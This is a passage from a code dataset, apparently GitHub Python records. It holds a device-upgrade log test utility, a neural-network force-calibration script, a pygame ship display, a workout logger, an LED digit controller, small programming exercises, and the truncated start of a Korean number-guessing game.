__calculate_upg_state_duration(node, records):\n last_ts = None\n\n for r in reversed(records):\n if not __is_record_type_state(r):\n continue\n if last_ts == None:\n last_ts = __get_datetime_from_record(r)\n r['duration'] = 0\n else:\n r['duration'] = last_ts - __get_datetime_from_record(r)\n last_ts = __get_datetime_from_record(r)\n\ndef __dump_upg_log(node, logs):\n api.Logger.SetNode(node)\n indent = \"-\" * 25\n api.Logger.info(f\"{indent} U P G R A D E L O G S {indent}\")\n for log in logs:\n api.Logger.info(log)\n api.Logger.SetNode(None)\n\ndef __display_upg_state_transition(node, records):\n __calculate_upg_state_duration(node, records)\n api.Logger.SetNode(node)\n indent = \"-\" * 25\n api.Logger.info(\"\\n\")\n api.Logger.info(f\"{indent} U P G R A D E S T A T E T R A N S I T I O N {indent}\")\n for r in records:\n if __is_record_type_state(r):\n api.Logger.info(\"- {} {:<45} {}\".format(r['ts'], r['msg'], r['duration']))\n api.Logger.info(\"Total Time : %s\\n\\n\"%(__get_datetime_from_record(records[-1]) - \\\n __get_datetime_from_record(records[1])))\n api.Logger.SetNode(None)\n\ndef ResetUpgLog(nodes):\n nodes = nodes if nodes else api.GetNaplesWorkloads()\n req = api.Trigger_CreateExecuteCommandsRequest(serial=False)\n\n for node in nodes:\n cmd = f\":>{__upg_log_path}\"\n api.Trigger_AddNaplesCommand(req, node, cmd)\n\n resp = api.Trigger(req)\n for cmd in resp.commands:\n api.PrintCommandResults(cmd)\n if cmd.exit_code != 0:\n api.Logger.error(f\"Failed to reset upgrade log on {cmd.node_name}\")\n return api.types.status.FAILURE\n return api.types.status.SUCCESS\n\ndef __dhcp_oob_mnic0(nodes):\n nodes = nodes if nodes else api.GetNaplesWorkloads()\n dhclient_cmd = \"dhclient oob_mnic0\"\n req = api.Trigger_CreateExecuteCommandsRequest(serial=False)\n\n for node in nodes:\n api.Trigger_AddNaplesCommand(req, node, dhclient_cmd)\n\n resp = api.Trigger(req)\n for cmd in resp.commands:\n api.PrintCommandResults(cmd)\n if cmd.exit_code != 0:\n api.Logger.error(f\"Failed to run dhclient on {cmd.node_name}\")\n return api.types.status.FAILURE\n return api.types.status.SUCCESS\n\ndef GetUpgLog(nodes, log_dir):\n nodes = nodes if nodes else api.GetNaplesWorkloads()\n file_name = f\"{log_dir}/{__upg_log_fname}\"\n for node in nodes:\n 
if __dhcp_oob_mnic0([node]) != api.types.status.SUCCESS:\n return api.types.status.FAILURE\n api.CopyFromNaples(node, [__upg_log_path], log_dir, via_oob=True)\n if os.path.exists(file_name):\n os.rename(file_name, __get_upg_log_fname_from_node(node, log_dir))\n else:\n api.Logger.error(f\"Upgrade logs for {node} not found @ {file_name}\")\n return api.types.status.FAILURE\n return api.types.status.SUCCESS\n\ndef VerifyUpgLog(nodes, log_dir):\n for node in nodes:\n if GetUpgLog([node], log_dir) != api.types.status.SUCCESS:\n api.Logger.error(f\"Failed to get the upgrade log for {node}\")\n return api.types.status.FAILURE\n\n with open(__get_upg_log_fname_from_node(node, log_dir)) as f:\n logs = f.readlines()\n if not logs:\n api.Logger.error(f\"Failed to read logs from {node}\")\n return api.types.status.FAILURE\n __dump_upg_log(node, logs)\n\n records = __disset_upg_log(node, logs)\n if not records:\n api.Logger.error(f\"Failed to dissect the upgrade logs from {node}\")\n return api.types.status.FAILURE\n\n if __find_err_in_upg_log(node, records) != api.types.status.SUCCESS:\n return api.types.status.FAILURE\n\n __display_upg_state_transition(node, records)\n\n return api.types.status.SUCCESS\n","repo_name":"ccdxc/sw","sub_path":"iota/test/iris/testcases/naples_upgrade/upgrade_utils.py","file_name":"upgrade_utils.py","file_ext":"py","file_size_in_byte":5276,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
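The log dissector above hinges on one named-group regex. Running it on a synthetic log line (the line itself is made up, but follows the `LVL [ts] (tid) [fname] msg` shape the parser expects) shows what each record dict looks like:

```python
import re

line = 'I [2021-03-01 10:15:30.123+00:00] (1234) [MoveStateMachine] moved to PrepareStage'
r_exp = r"(?P<lvl>[I,D,E]) \[(?P<ts>.*)\] \((?P<tid>.*)\) \[(?P<fname>.*)\] (?P<msg>.*)"
m = re.search(r_exp, line)
print({k: m.group(k) for k in ("lvl", "ts", "tid", "fname", "msg")})
# {'lvl': 'I', 'ts': '2021-03-01 10:15:30.123+00:00', 'tid': '1234',
#  'fname': 'MoveStateMachine', 'msg': 'moved to PrepareStage'}
```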
+{"seq_id":"70089195751","text":"import torch\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.utils.data as Data\n\nimport matplotlib.pyplot as plt\n#matplotlib inline\n\nimport numpy as np\nimport imageio\nfrom numpy import genfromtxt\n\n\n# settings\nTRAIN = True\n\n# read the training data\nrepo = 'ingripper calibration/fast - 5 cycles - pi_3/'\n#repo = 'ingripper calibration/fast - 5 cycles - pi_3/'\nati = np.genfromtxt(repo + 'atiData.txt', delimiter=' ',dtype=float)\ndiffsig = np.genfromtxt(repo + 'diffData.txt', delimiter=' ',dtype=float)\nsumsig = np.genfromtxt(repo + 'sumData.txt', delimiter=' ',dtype=float)\npos = np.genfromtxt(repo + 'posData.txt', delimiter=' ',dtype=float)\nvel = np.genfromtxt(repo + 'velData.txt', delimiter=' ',dtype=float)\neff = np.genfromtxt(repo + 'effData.txt', delimiter=' ',dtype=float)\n#temp = np.genfromtxt(repo + 'tempData.txt', delimiter=' ',dtype=float)\n#temp = temp[:,np.newaxis]\n\n# build the feature vector\ndiffsig = diffsig-np.mean(diffsig[0:500,:],axis = 0)\nati = ati-np.mean(ati[0:500,:],axis = 0)\nNsig = diffsig/sumsig\nNsig = np.hstack((Nsig,Nsig**2))\n\nx = np.hstack((Nsig,pos,vel,eff));\nmean_x = np.mean(x,axis=0)\nstddev_x = np.std(x,axis=0)\nx = (x-mean_x)/stddev_x\nmax_ati = np.max(np.abs(ati),axis=0);\ny = ati/max_ati\n\nxss = x[0:x.shape[0]:50,:]\nyss = y[0:y.shape[0]:50,:]\n\n# split data to training and test sets\ndataSize = xss.shape[0]\ntrainSize = int(np.floor(0.7*dataSize))\ntestSize = dataSize-trainSize\ntrainIndex,testIndex = torch.utils.data.random_split(range(dataSize), [trainSize, testSize], generator=torch.Generator().manual_seed(2020))\n\nxTrain = xss[trainIndex,:]\nyTrain = yss[trainIndex,:]\nxTest = xss[testIndex,:]\nyTest = yss[testIndex,:]\n\n# this is one way to define a network\nclass Net(torch.nn.Module):\n def __init__(self, n_feature, n_hidden, n_output):\n super(Net, self).__init__()\n self.hidden1 = torch.nn.Linear(n_feature, n_hidden[0]) # hidden layer\n self.hidden2 = torch.nn.Linear(n_hidden[0], n_hidden[1]) # hidden layer\n #self.hidden3 = torch.nn.Linear(n_hidden[1], n_hidden[2]) # hidden layer\n self.predict = torch.nn.Linear(n_hidden[1], n_output) # output layer\n # Define proportion or neurons to dropout\n self.dropout = torch.nn.Dropout(0.8)\n def forward(self, x):\n x = torch.sigmoid(self.hidden1(x)) # activation function for hidden layer\n x = torch.sigmoid(self.hidden2(x)) # activation function for hidden layer\n #x = self.dropout(x)\n #x = self.dropout(x)\n #x = torch.sigmoid(self.hidden3(x)) # activation function for hidden layer\n #x = self.dropout(x)\n out = self.predict(x) # linear output\n return out\n\n# model architecture\nhlayers = [30,10]\nnfeatures = np.shape(xTrain)[1]\nnoutput = np.shape(yTrain)[1]\nArch = '_30_10'\n\nif TRAIN:\n\t# torch can only train on Variable, so convert them to Variable\n xTrain = Variable(torch.from_numpy(xTrain))\n yTrain = Variable(torch.from_numpy(yTrain))\n \n # Check cuda availability\n cuda = torch.cuda.is_available()\n \n # Create neural network model\n if cuda:\n torch.cuda.manual_seed(2020)\n model = Net(n_feature = nfeatures, n_hidden = hlayers, n_output = noutput).cuda()\n device = 'cuda'\n else:\n torch.manual_seed(2020)\n model = Net(n_feature = nfeatures, n_hidden = hlayers, n_output = noutput)\n device = 'cpu'\n\n optimizer = torch.optim.LBFGS(model.parameters())\n loss_func = torch.nn.MSELoss() # this is for regression mean squared loss\n \n model = model.double()\n xTrain = xTrain.to(device) \n yTrain = 
yTrain.to(device)\n \n def closure():\n optimizer.zero_grad()\n output = model(xTrain)\n loss = loss_func(output, yTrain)\n loss.backward()\n return loss\n \n for epoch in range(200): # loop over the dataset multiple times\n prediction = model(xTrain) # input x and predict based on x\n\n #loss = loss_func(prediction, yTrain) # must be (1. nn output, 2. target)\n\n #optimizer.zero_grad() # clear gradients for next train\n #loss.backward() # backpropagation, compute gradients\n loss = optimizer.step(closure) # apply gradients\n\n # print statistics\n running_loss = loss.item()\n print('[%d] loss: %.7f' %(epoch + 1,running_loss))\n\n print('Finished Training')\n\t\n torch.save(model.state_dict(),'model%s.pth' %(Arch))\n\nnet = Net(n_feature=np.shape(x)[1], n_hidden=hlayers, n_output=np.shape(ati)[1])\nnet = net.double()\nnet.load_state_dict(torch.load('model%s.pth' %(Arch)))\npred = net(Variable(torch.from_numpy(x)))\npred = pred.detach().numpy()\npred = pred*max_ati\n\nfig, axs = plt.subplots(3, 2)\naxs[0, 0].plot(ati[:,0])\naxs[0, 0].plot(pred[:,0])\n\naxs[1, 0].plot(ati[:,1])\naxs[1, 0].plot(pred[:,1])\n\naxs[2, 0].plot(ati[:,2])\naxs[2, 0].plot(pred[:,2])\n\naxs[0, 1].plot(ati[:,3])\naxs[0, 1].plot(pred[:,3])\n\naxs[1, 1].plot(ati[:,4])\naxs[1, 1].plot(pred[:,4])\n\naxs[2, 1].plot(ati[:,5])\naxs[2, 1].plot(pred[:,5])\nplt.show()\n","repo_name":"amirhadi3/dVRK-compliantTrocar","sub_path":"NN.py","file_name":"NN.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
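`torch.optim.LBFGS`, used in the record above, may re-evaluate the model several times per step, which is why it takes a closure instead of the usual zero_grad/backward/step sequence. A minimal self-contained fit of y = 2x showing the same pattern:

```python
import torch

x = torch.linspace(-1, 1, 50).unsqueeze(1)
y = 2.0 * x
model = torch.nn.Linear(1, 1)
optimizer = torch.optim.LBFGS(model.parameters())
loss_fn = torch.nn.MSELoss()

def closure():
    # LBFGS can call this multiple times per step(), so the closure
    # must zero the gradients and recompute the loss itself.
    optimizer.zero_grad()
    loss = loss_fn(model(x), y)
    loss.backward()
    return loss

for _ in range(5):
    loss = optimizer.step(closure)
print(float(loss), float(model.weight))   # weight approaches 2.0
```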
+{"seq_id":"21178697391","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\nb = 1.95\nr = 1\nmass = 1.9\ng = 4\nSF = 1.5\n\nA = [[(b**3)/12,b],[(b**2)/4,(1-r)]]\nB = [mass*g*SF,0]\na,c = np.linalg.solve(A,B)\n\n\nxs = np.linspace(-b/2,b/2,1000)\n\nplt.figure()\nplt.grid()\nplt.ylim([0,c*1.2])\nplt.plot(xs, a*xs**2 + c)\nplt.show()","repo_name":"Lanzebe/P02-TuksProjects","sub_path":"Y4-MLV420/SparDesign/TestWingDist.py","file_name":"TestWingDist.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"1528801527","text":"import os\nimport csv\nimport constants\nfrom getsaveddata import get_last_log_date\nfrom menufunctions import quit_function, clear_screen\nfrom currentstreaks import CurrentStreaksAlert\n\n\nclass Workout:\n def __init__(self, log, date, workout_dict, confirmation):\n self.log = log\n self.workout_dict = workout_dict\n self.date = date\n self.confirmation = confirmation\n\n def check_for_todays_workout(self):\n # Open log file and check if there is an existing workout for today\n last_log = get_last_log_date()\n if self.date == last_log:\n return True\n else:\n return False\n\n def get_workout_from_user(self):\n if not self.check_for_todays_workout():\n while True:\n user_input = input(\"Now editing today's workout.\\nEnter an exercise followed by a number \"\n \"(reps or duration) e.g. 'push-up 20'. Type 'f' when finished: \")\n if user_input.lower() == \"q\":\n quit_function() \n elif user_input.lower() == \"f\":\n break\n else:\n # Separate number from exercise name\n number = user_input.split()[-1]\n # Remove number and extra space from end of exercise name\n exercise_name = user_input[:-(len(number) + 1)]\n if exercise_name not in constants.EXERCISE_LIST:\n print(\"Error: Enter a valid exercise type and a number.\")\n elif not number.isnumeric():\n print(\"Error: Exercise reps or duration must be numeric.\")\n else:\n self.workout_dict[exercise_name] = number\n else:\n print(\"Error: You have already logged a workout for today.\")\n return\n\n def show_workout(self):\n clear_screen()\n for key, value in self.workout_dict.items():\n print(key, value)\n\n def edit_workout(self):\n self.show_workout()\n self.get_workout_from_user()\n\n def confirm_workout(self):\n if self.workout_dict == {}:\n return\n else:\n while True:\n self.show_workout()\n user_input = input(\"Log this workout? 'Y' for 'yes', 'e' for 'edit' or 'c' for cancel. \")\n if user_input.lower() == \"q\":\n quit_function()\n elif user_input.lower() == \"c\":\n return\n elif user_input.lower() == \"y\":\n self.confirmation = True\n return\n elif user_input.lower() == \"e\":\n self.edit_workout()\n else:\n continue\n\n def write_workout_to_csv(self):\n if self.confirmation == True:\n write_to_csv_dict = {\"date\": self.date}\n # Create comprehensive dictionary with every exercise in exercise list\n for exercise in constants.EXERCISE_LIST:\n write_to_csv_dict[exercise] = 0\n # Copy today's workout into comprehensive dictionary\n for key in self.workout_dict:\n write_to_csv_dict[key] = self.workout_dict[key]\n with open(self.log, \"a\") as log:\n writer = csv.writer(log)\n writer.writerow(write_to_csv_dict.values())\n\n def streak_alert(self):\n if self.confirmation == True:\n streak_alert = CurrentStreaksAlert(list(self.workout_dict.keys()))\n streak_alert.current_streaks_alert()\n\n def get(self):\n self.get_workout_from_user()\n self.confirm_workout()\n self.write_workout_to_csv()\n self.streak_alert()","repo_name":"plutoniumcat/DailyExercise","sub_path":"workout.py","file_name":"workout.py","file_ext":"py","file_size_in_byte":3760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"18527549063","text":"'''\n092 - Crie um programa que leia nome, ano de nascimento e carteira de trabalho e\ncadastre-os (com idade) em um dicionario, se por acaso a CTPS for diferente de ZERO,\no dicionario recebera tambem o ano de contratação e o salario. Calcule e acrescente,\nalem da idade, com quantos anos a pessoa vai se aposentar.\n'''\nfrom datetime import datetime\ndados = dict()\ndados['Nome'] = str(input('Nome: ')).strip().title()\nnasc = int(input('Ano de Nascimento: '))\ndados['Idade'] = datetime.now().year - nasc\ndados['CTPS'] = int(input('Carteira de Trabalho (0 não tem): '))\nif dados['CTPS'] != 0:\n dados['Contratação'] = int(input('Ano de Contratação: '))\n dados['Salario'] = float(input('Salario: '))\n #anos_trabalhados = 35 - (datetime.now().year - dados['Contratação'])\n dados['Aposentadoria'] = dados['Idade'] + (35 - (datetime.now().year - dados['Contratação']))\nprint('-=' * 15)\nfor k, c in dados.items():\n print(f'{k} tem o valor {c}')\n\n\n\n\n\n","repo_name":"mariocarvalho-2205/python","sub_path":"092 nome ano nasc carteira de trabalho.py","file_name":"092 nome ano nasc carteira de trabalho.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"19468277029","text":"# def type_int(int_number):\n# return int_number * 2\n#\n#\n# def type_float(float_number):\n# result = float_number * 1.5\n# return f\"{result:.2f}\"\n#\n#\n# def type_string(string):\n# return \"$\" + string + \"$\"\n#\n#\n# data_type = input()\n# value = input()\n#\n# if data_type == \"int\":\n# value = int(value)\n# print(type_int(value))\n# elif data_type == \"real\":\n# value = float(value)\n# print(type_float(value))\n# elif data_type == \"string\":\n# print(type_string(value))\n\n\ndef calculations(data_type, value):\n if data_type == \"int\":\n value = int(value)\n return value * 2\n\n if data_type == \"real\":\n value = float(value)\n return f\"{value * 1.5:.2f}\"\n\n if data_type == \"string\":\n return \"$\" + value + \"$\"\n\n\ninput_data_type = input()\ninput_value = input()\n\nprint(calculations(input_data_type, input_value))\n","repo_name":"azashev/Programming-Fundamentals-with-Python-Softuni","sub_path":"Functions/data_types.py","file_name":"data_types.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"74901355749","text":"from gpiozero import LED\n\n\"\"\"\n =0=\n| |\n1 2\n| |\n =3=\n| |\n4 5\n| |\n =6=\n\"\"\"\n\nMAP_VAL = {\n 0: [0, 1, 2, 4, 5, 6],\n 1: [2, 5],\n 2: [0, 2, 3, 4, 6],\n 3: [0, 2, 3, 5, 6],\n 4: [1, 2, 3, 5],\n 5: [0, 1, 3, 5, 6],\n 6: [0, 1, 3, 4, 5, 6],\n 7: [0, 2, 5],\n 8: [0, 1, 2, 3, 4, 5, 6],\n 9: [0, 1, 2, 3, 5, 6]\n}\nMAP_ADDR = {\n 0: 16,\n 1: 20,\n 2: 21,\n 3: 6,\n 4: 13,\n 5: 19,\n 6: 26,\n}\n\n\nclass DigitOutputController:\n debug = False\n\n def __init__(self, masks=MAP_VAL, addresses=MAP_ADDR, debug=False):\n if debug:\n self.debug = True\n return\n\n self._leds = [LED(i) for i in addresses.values()]\n self._masks = masks\n\n def show(self, digit=0):\n if self.debug:\n print(digit)\n return\n\n vals = self._masks.get(digit, [])\n\n for i, led in enumerate(self._leds):\n led.value = i in vals\n","repo_name":"BANOnotIT/voice-ziferblat","sub_path":"core/digit_controller.py","file_name":"digit_controller.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"33109716351","text":"import math\r\nimport pygame as pg\r\n\r\nWHITE = (255, 255, 255)\r\nBACKGND = (0, 0, 0)\r\nLAWNGREEN = (0, 223, 0)\r\nSARGA = (230, 230, 40)\r\nBARNA = (200, 135, 80)\r\nBORDO = (100, 0, 0)\r\n\r\nclass HajoObject:\r\n #hajo meretek, [m]\r\n length = 13.64\r\n width = 4.1\r\n #hajo pozicioja, [m, rad]\r\n position = pg.math.Vector2(0.0,0.0)\r\n rotation = 0.0\r\n #hajo sebessege [m/s, rad/s]\r\n speed = pg.math.Vector2(0,0)\r\n speed2 = pg.math.Vector2(0,0)\r\n speed3 = pg.math.Vector2(0,0)\r\n szogseb = 0.0\r\n #relativ pozicio a megjeleniteshez\r\n midscreen = pg.math.Vector2(0,0)\r\n #hajo pontjai, [m]. Ezt atalakitjuk vektorokka a konstrutorban, azt lehet hasznalni\r\n# hajoPoly = [(0, 6.82), (-1.35, 5.42), (-2.05, 0), (-2.05, -6.82), (2.05, -6.82), (2.05, 0), (1.35, 5.42)]\r\n hajoPoly = [(0.5, 0), (0.4, -0.1), (0, -0.15), (-0.5, -0.15), (-0.5, 0.15), (0, 0.15), (0.4, 0.1)]\r\n hajoOffset = 0.0 #ennyivel elorebb tolja a hajo korvonalat a centerhez kepest, csak a megjeleniteshez, hogy szep legyen a fordulas\r\n #elozo kirajzolt polygon a torleshez\r\n lastPoly = [(0,0), (0,0), (0,0)]\r\n speedVect = [pg.math.Vector2(0,0), pg.math.Vector2(0,0)] #ez a zold sebesseg\r\n speedVect2 = [pg.math.Vector2(0,0), pg.math.Vector2(0,0)] #ez meg a sarga / INS\r\n speedVect3 = [pg.math.Vector2(0,0), pg.math.Vector2(0,0)] #ez meg a barna / GPS\r\n thrustVects = [[]] * 5 # a hajo koordinatarendszereben az aktuatorok vektorai\r\n #lastThVec = [ [(0,0), (0,0)] ] * 5\r\n Thrust = [0] * 4\r\n thrustVects = [[]]*5 # a hajo koordinatarendszereben az aktuatorok vektorai\r\n lastThVec = [ \r\n [(0,0), (0,0)],\r\n [(0,0), (0,0)],\r\n [(0,0), (0,0)],\r\n [(0,0), (0,0)],\r\n [(0,0), (0,0)]\r\n ]\r\n U12V = 0.0\r\n Uact = [0.0]*4\r\n Iact = [0.0]*4\r\n count = 0 #ez csak egy szam, a modellnel a packet counter erteke, hogy lassuk a mukodest\r\n\r\n def __init__(self, scr, dict) -> None:\r\n self.screen = scr\r\n self.ship_scale = dict[\"length\"]\r\n self.scr_scale = dict[\"zoom\"]\r\n self.hajoOffset = dict['offset']\r\n self.midscreen = pg.math.Vector2(scr.get_width() / 2, scr.get_height() / 2)\r\n # a hajo formaja, felskalazva, offsetelve, de zoomolas elott\r\n self.hajoVect = list(map(lambda x: pg.math.Vector2(x)*self.ship_scale+(self.hajoOffset, 0), self.hajoPoly))\r\n self.font = pg.font.Font(None, 24)\r\n #meghajtas kijelzeshez vektorok\r\n self.thrustVects[0] = [(dict['orrL'], 0), (0, -1)] #orrsugar helye, iranya\r\n self.thrustVects[1] = [(-dict['farL'], 0), (0, -1)] #farsugar helye, iranya\r\n self.thrustVects[2] = [(self.hajoVect[3][0], dict['motL']/-2), (-1, 0)] #jobb motor \r\n self.thrustVects[3] = [(self.hajoVect[3][0], dict['motL']/2), (-1, 0)] #bal motor helye\r\n self.thrustVects[4] = [(self.hajoVect[0][0], 0), (0, 1)] #forgas vektor helye, iranya\r\n\r\n def doSpeedVec(self, V):\r\n result = [0,0]\r\n speedVect = V.rotate_rad(self.rotation)\r\n result[0] = self.position*self.scr_scale\r\n result[1] = (self.position+speedVect)*self.scr_scale\r\n # flippelni kell lefele, es betenni a kepernyo kozepere\r\n result = list(map(lambda x: (x.x + self.midscreen.x, self.midscreen.y - x.y), result))\r\n return result\r\n\r\n def draw(self, color=WHITE):\r\n #elozo torlese\r\n pg.draw.polygon(self.screen, BACKGND, self.lastPoly)\r\n pg.draw.line(self.screen, BACKGND, self.speedVect[0], self.speedVect[1], width = 3)\r\n pg.draw.line(self.screen, BACKGND, self.speedVect2[0], self.speedVect2[1], width = 3)\r\n pg.draw.line(self.screen, BACKGND, self.speedVect3[0], 
self.speedVect3[1], width = 3)\r\n for x in range(5):\r\n pg.draw.line(self.screen, BACKGND, self.lastThVec[x][0], self.lastThVec[x][1], width = 3)\r\n # uj vektorok szamitasa\r\n #vektor talppontja\r\n tol = (pg.math.Vector2(self.thrustVects[x][0]).rotate_rad(self.rotation) + self.position)*self.scr_scale\r\n if(x < 4):\r\n temp = self.Thrust[x]\r\n else:\r\n temp = self.szogseb * 5\r\n ig = tol + (pg.math.Vector2(self.thrustVects[x][1]).rotate_rad(self.rotation)) * self.scr_scale*temp*self.ship_scale/5\r\n #flippelni, kozepre tenni\r\n self.lastThVec[x][0] = (tol.x + self.midscreen.x, self.midscreen.y - tol.y)\r\n self.lastThVec[x][1] = (ig.x + self.midscreen.x, self.midscreen.y - ig.y)\r\n\r\n #uj pozicio szamitasa\r\n #forgatas, poziciora mozgatas, aztan skalazas(zoom):\r\n shipmap = map(lambda x: (x.rotate_rad(self.rotation) + self.position) * self.scr_scale, self.hajoVect)\r\n\r\n # flippelni kell lefele, es betenni a kepernyo kozepere\r\n self.lastPoly = list(map(lambda x: (x.x + self.midscreen.x, self.midscreen.y - x.y), shipmap))\r\n # uj sebesseg vektorok eloallitasa\r\n self.speedVect = self.doSpeedVec(self.speed)\r\n self.speedVect2 = self.doSpeedVec(self.speed2)\r\n self.speedVect3 = self.doSpeedVec(self.speed3)\r\n # uj rajzolas\r\n pg.draw.polygon(self.screen, color, self.lastPoly)\r\n pg.draw.line(self.screen, LAWNGREEN, self.speedVect[0], self.speedVect[1], width = 3)\r\n pg.draw.line(self.screen, SARGA, self.speedVect2[0], self.speedVect2[1], width = 3)\r\n pg.draw.line(self.screen, BARNA, self.speedVect3[0], self.speedVect3[1], width = 3)\r\n for x in self.lastThVec:\r\n pg.draw.line(self.screen, BORDO, x[0], x[1], width = 3)\r\n pg.draw.line(self.screen, LAWNGREEN, self.lastThVec[4][0], self.lastThVec[4][1], width = 3)\r\n # texts\r\n # speed, ez a valos sebesseg vagy az INS sebesseg\r\n text = self.font.render(\"Speed / GPS\", True, LAWNGREEN, BACKGND)\r\n yy = 10\r\n self.screen.blit(text, (10,yy))\r\n for i in range(2):\r\n text = self.font.render(f\"V{i}: {self.speed[i]:3.2f} [m/s], \", True, WHITE, BACKGND)\r\n self.screen.blit(text, (150+i*130,yy))\r\n # speed2, ez a modell sebesseg\r\n text = self.font.render(\"INS sebesseg\", True, SARGA, BACKGND)\r\n yy = 35\r\n self.screen.blit(text, (10,yy))\r\n for i in range(2):\r\n text = self.font.render(f\"V{i}: {self.speed2[i]:3.2f} [m/s], \", True, WHITE, BACKGND)\r\n self.screen.blit(text, (150+i*130,yy))\r\n # speed3, ez a GPS sebesseg\r\n text = self.font.render(\"Modell sebesseg\", True, BARNA, BACKGND)\r\n yy = 60\r\n self.screen.blit(text, (10,yy))\r\n for i in range(2):\r\n text = self.font.render(f\"V{i}: {self.speed3[i]:3.2f} [m/s], \", True, WHITE, BACKGND)\r\n self.screen.blit(text, (150+i*130,yy))\r\n # Uact, aktuator feszultsegek\r\n text = self.font.render(f\"U12: {self.U12V:2.2f} [V]\", True, WHITE, BACKGND)\r\n self.screen.blit(text, (500,10))\r\n text = self.font.render(f\"Packet cnt: {self.count}\", True, WHITE, BACKGND)\r\n self.screen.blit(text, (480,35))\r\n yy = 85\r\n text = self.font.render(\"Orrsugar ---------- Farsugar ---------- Jobb mot. 
--------- Bal mot.\", True, WHITE, BACKGND)\r\n self.screen.blit(text, (150,yy))\r\n text = self.font.render(\"Feszultsegek\", True, WHITE, BACKGND)\r\n yy = 110\r\n self.screen.blit(text, (10,yy))\r\n for i in range(4):\r\n text = self.font.render(f\"{self.Uact[i]:3.2f} [V], \", True, WHITE, BACKGND)\r\n self.screen.blit(text, (150+i*130,yy))\r\n\r\n text = self.font.render(\"Áramok\", True, WHITE, BACKGND)\r\n yy = 135\r\n self.screen.blit(text, (10,yy))\r\n for i in range(4):\r\n text = self.font.render(f\"{self.Iact[i]:3.2f} [A], \", True, WHITE, BACKGND)\r\n self.screen.blit(text, (150+i*130,yy))\r\n\r\n # sebesseg megadasa, sajat koordinatarendszerbe. Ez csak a kiirashoz kell\r\n def setspeed(self, V):\r\n self.speed = pg.math.Vector2(V[0], V[1])\r\n self.szogseb = V[2]\r\n\r\n # a masik ket sebesseg vektor megadasa\r\n def setSpeeds(self, V2, V3):\r\n self.speed2 = pg.math.Vector2(V2[0], V2[1])\r\n self.speed3 = pg.math.Vector2(V3[0], V3[1])\r\n\r\n # pozicio, fix kordinatarenszerben\r\n def setPosition(self, X):\r\n self.position.x = X[0]\r\n self.position.y = X[1]\r\n self.rotation = X[2]\r\n\r\n # aktuator erok, sajat kordinatarenszerben\r\n def setThrust(self, T):\r\n self.Thrust = T\r\n\r\n # ez kozeppre teszi a hajot\r\n def resetPos(self):\r\n X = self.position*self.scr_scale\r\n self.midscreen = (self.screen.get_width() / 2, self.screen.get_height() / 2) - pg.math.Vector2(X.x, -X.y)\r\n\r\n","repo_name":"eendsze/ssiresdsk","sub_path":"hajomegjelenito.py","file_name":"hajomegjelenito.py","file_ext":"py","file_size_in_byte":8667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"6912349734","text":"class cond_tree_node:\n data = None\n node_type = None # ATTRIBUTE, INTEGER, REL_OP, LOGIC_OP\n left = None\n right = None\n\n def __init__(self, data, node_type, left=None, right=None):\n self.data = data\n self.node_type = node_type\n self.left = left\n self.right = right\n\n \n def __str__(self):\n result = \"\"\n if self.left:\n result += \"(\" + self.left.__str__()\n if self.data:\n result += \"\" + self.data + \"\"\n if self.right:\n result += self.right.__str__() + \")\"\n\n return result\n\n \n def __add__(self, other):\n return str(self) + other\n\n \n def __radd__(self, other):\n return other + str(self)\n\n \n def get_all_atts_in_cond(self):\n if (self.left is None and self.right is None): # is leaf\n if (self.node_type == \"ATTRIBUTE\"):\n return [self.data]\n else:\n return []\n\n return self.left.get_all_atts_in_cond() + self.right.get_all_atts_in_cond()\n\n\n def get_attribute_table(self):\n \"\"\"receives an attribute-node and returns R or S\"\"\" \n result = None \n if(self.node_type == \"ATTRIBUTE\"):\n result = (self.data[0]) \n \n return result\n\n \n def get_attribute_alone(self):\n \"\"\"receives an attribute-node and returns atribute alone\"\"\" \n result = None \n if(self.node_type == \"ATTRIBUTE\"):\n result = (self.data[2]) \n \n return result\n\n\n def are_different_tables(self):\n table1 = self.left.get_attribute_table()\n table2 = self.right.get_attribute_table()\n return (table1 != table2)\n\n \n def are_same_attributes(self):\n att1 = self.left.get_attribute_alone()\n att2 = self.right.get_attribute_alone()\n return (att1==att2) ","repo_name":"OMRYZUTA/databases_2","sub_path":"conditionTree.py","file_name":"conditionTree.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"16350709509","text":"\"\"\"\n#내가 짜본 코드\n\nfrom random import randint\nimport time\nfrom datetime import datetime\n\n\n\ndef unique(x): #중복입력방지를 위한 함수\n for i in x:\n if(x.count(i)>=2):\n return False\n return True\n\nstart_time = time.time()\nbaseball = True\n\n\n\nwhile baseball:\n count = 0\n n = 0\n \n try: n=int(input(\"몇자리수인지 입력하시오.(1~10)\"))\n \n except ValueError:\n print(\"숫자를 입력하시오.\")\n break\n \n \n if n > 10 :\n print(\"1~10까지 정수만\")\n \n elif n <=10 :\n num=['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n guess = []\n for i in range(n):\n temp = randint(0, len(num)-1)\n guess.append(num[temp])\n print(guess)\n print(\"띄어쓰기 하지말고 0~9사이의 숫자들을 적으시오.\")\n \n baseball2 = True\n while baseball2:\n count+=1\n usr_guess = str(input(\"숫자를 맞혀보세요.\"))\n try: temp=int(usr_guess)\n \n except ValueError:\n if usr_guess == 'exit':\n baseball2 = False\n baseball = False\n \n if len(usr_guess) != n:\n print(n, \"자리 숫자입니다.\")\n \n elif not unique(usr_guess):\n print(\"\\n 중복은 